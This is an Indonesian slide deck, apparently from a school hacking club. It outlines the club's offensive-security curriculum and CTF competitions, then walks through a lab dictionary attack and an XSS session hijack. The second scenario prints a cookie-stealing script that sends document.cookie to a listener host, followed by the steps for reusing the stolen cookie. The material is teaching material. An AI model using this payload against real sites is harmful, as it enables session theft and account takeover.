Upload
aurum-radiance
View
53
Download
1
Embed Size (px)
Citation preview
CYBER SECURITY Seiring perkembangannya teknologi, maka berbagai masalah
datang, antara lain adalah keamanan siber, dengan pesatnya jumlah pengguna komputer, dan sangat dikit yang menyadari seberapa pentingnya keamanan siber, maka dibuatnya komunitas Offensive Security of Smansaka (Offsecos).
“Best defense is a good offense” –jack dempsy, maka dari itu, Offescos berisi tentang Hacking dalam rangka menemukan kelemahan dari sebuah sistem/jaringan (penetration testing).
Selain itu peserta akan berdiskusi tentang Computer Forensic, Security Assesment.
DALAM KOMUNITAS INI AKAN DIAJARKAN
Penyerangan terhadap website XSS LFI RFI LDAP Injection SSI Injection SQL Injection FTP Bounce Attack Symlinking CSRF Dictionary Attack
Penyerangan terhadap system Buffer Overflow Remote Code Execution Privilege Escalating Backdoor Viruses and Worm
Penyerangan terhadap network Cracking WEP Cracking WPA2 Cracking WPS ARP Spoofing DNS Spoofing Port Stealing Traffic Tunneling
PERLOMBAANNO
Nama Perlombaan Waktu Biaya Lokasi Hadiah
1 CDC Kemhan ~10 Nov Free “UNKNOWN” “UNKNOWN”2 Agrihack ~20-21 Nov 50k IPB 3,5 JT + Trophy +
Sertifikat3 IDSECCONF ~26 Nov 25K Yogyakarta Pembicara (API), +1 jt
rupiah4 CTF : HACK THE
DRAGON~8 Feb Free Online “UNKNOWN”
5 Compfest CTF ~21 Nov ?? ~Balairung UI 7 JT + Biznet Cloud 7 JT6 Cyber Jawara ~25 Nov Free Bali 20 JT + ikut Cyber Sea
Games
MODULE Pengajaran akan berbasis Teori-Praktek. Setiap peserta akan menginstall Pentest OS (Backbox, Kali Sana,
Backtrack, dll) Setiap melakukan aktivitas hacking dan hanya untuk aktivitas
hacking, peserta di haruskan untuk membuat Lab Report. Pada awal waktu peserta akan diajarkan dasar pengunaan Linux,
alat hacking yang digunakan, dan sedikit gambaran ketika sedang melakukan penetration testing.
KEPERLUAN Memiliki Network Interface Card yang support monitor mode. Mempunyai storage yang cukup untuk menginstall Penetration
Distro. Mempunyai Spec yang memadai untuk menginstall Pentest Lab. Memiliki kemauan untuk berusaha lebih keras
HACKING SCENARIO 1 Dictionary Attack adalah penyerangan dimana penyerang
mencoba sebuah list password untuk menguji 1 per 1 mana yang benar.
Dictionary Attack sering kali disalah artikan sebagai brute force attack, dimana perbedaannya adalah dictionary attack sumber password berasal dari sebuah list, sedangkan brute force attack, password merupakan semua kombinasi memungkinan dari charset yang sudah ditentukan.
HACKING SCENARIO 1 Karena kita ingin menggunakan sebuah alat, agar dapat
memasukan sandi jauh lebih cepat (rata rata 500-4000 sandi /detik). Kita perlu mengetahui output bila salah
Dan juga kita perlu mengetahui bagaimana input yang dapat dimasuki (karena website saya mudah, saya dapat memasukannya dari URL)
HACKING SCENARIO 1 Pada formulir terdapat 2 cara yaitu HTTP Post, dan HTTP Get,
untuk itu kita perlu liat source codenya agar kita dapat menentukan tipe apa ini (pada kasus saya yaitu get)
Cookie; karena ini lab, maka ada suatu hambatan yaitu cookie, karena sebelum saya dapat membuka lab ini saya harus login disebelumnya, bila saya menggunakan tools lain maka tools itu akan gagal karena tidak memiliki akses terhadap halaman yang akan diserang, oleh karena itu saya harus menginput cookie juga
HACKING SCENARIO 1 Maka info sudah cukup saya akan melaksanakan penyerangan Pada demo ini saya menggunakan wordlist yang hanya berisi 3
saja, namun pada kali sana sudah terdapat wordlist yang berisi ribuan password
SCENARIO HACKING 2 XSS atau Cross Site Scripting, ialah penyerangan pada sebuah
Form, dimana user input tidak di sanitize. Session Hijacking ialah sebuah nama penyerangan dimana
penyerang dapat mengambil suatu sesi dari korban (bisa berupa sesi browser)
Hal yang pertama diperlukan ialahmencari tau IP Address kita
SCENARIO HACKING 2 Saya telah menemukan sebuah form maka saya akan memasukan
script saya untuk mencuri cookie <Script>new image().src="http://192.168.1.103/pizza.php?
”+document.cookie;</script> Ketika seseorang menjalankan script browser tersebut akan meminta
gambar (gak ada gambarnya tapi) yang berada di sana, kemudian akan meminta cookie pada page yang tersedia tersebut
SCENARIO HACKING 2 Kemudian anda perlu mengsetup listener (yang akan membaca seluruh
traffic pada port tertentu)
Kemudian ketika korban membuka page yang adascript kita, maka akan didapatkan ini
Korban penyerang
SCENARIO HACKING 2 Dengan cookie tersebut saya akan memodifikasi browser saya
agar menggunakan cookie tersebut, saya menggunakan ekstensi cookie inspector pada chrome
Kemudian ketika saya refresh page, maka saya akan login sebagai korban saya
KONKLUSI Walau perkembangan keamanan siber telah meningkat bertahun
tahun, penyerangan masih saja dapat terjadi, hal ini disebabkan oleh kekurangannya pengetahuan user, ataupun admin tentang keamanan siber.
Walau terdapat orang yang mengetahuinya, masih saja dapat terjadi Miss-Configured Service dan juga Code sehingga melakukan penetration testing merupakan hal yang penting.